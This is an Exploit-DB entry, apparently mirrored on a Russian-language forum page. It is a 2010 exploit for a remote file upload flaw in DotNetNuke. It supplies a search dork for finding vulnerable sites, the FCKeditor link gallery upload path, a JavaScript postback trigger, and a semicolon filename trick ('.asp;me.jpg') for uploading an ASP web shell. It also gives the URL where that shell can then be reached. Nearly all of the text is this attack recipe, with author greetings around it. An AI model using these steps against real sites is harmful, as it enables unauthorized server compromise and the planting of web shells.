- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 12700
- Проверка EDB
-
- Пройдено
- Автор
- RA3CH & MA3STR0-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2010-05-22
Код:
************************************************************
** DotNetNuke Remote File upload Vulnerability
************************************************************
** Prodcut: DotNetNuke
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Remote File upload
** Risk : High
** Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors : Ra3cH & Ma3sTr0-Dz
** From : Algeria
** Contact : [email protected]
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
** Exploit:
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')
**
**
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg
************************************************************
**
** you find your Shell Hier
**
** http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************- Источник
- www.exploit-db.com
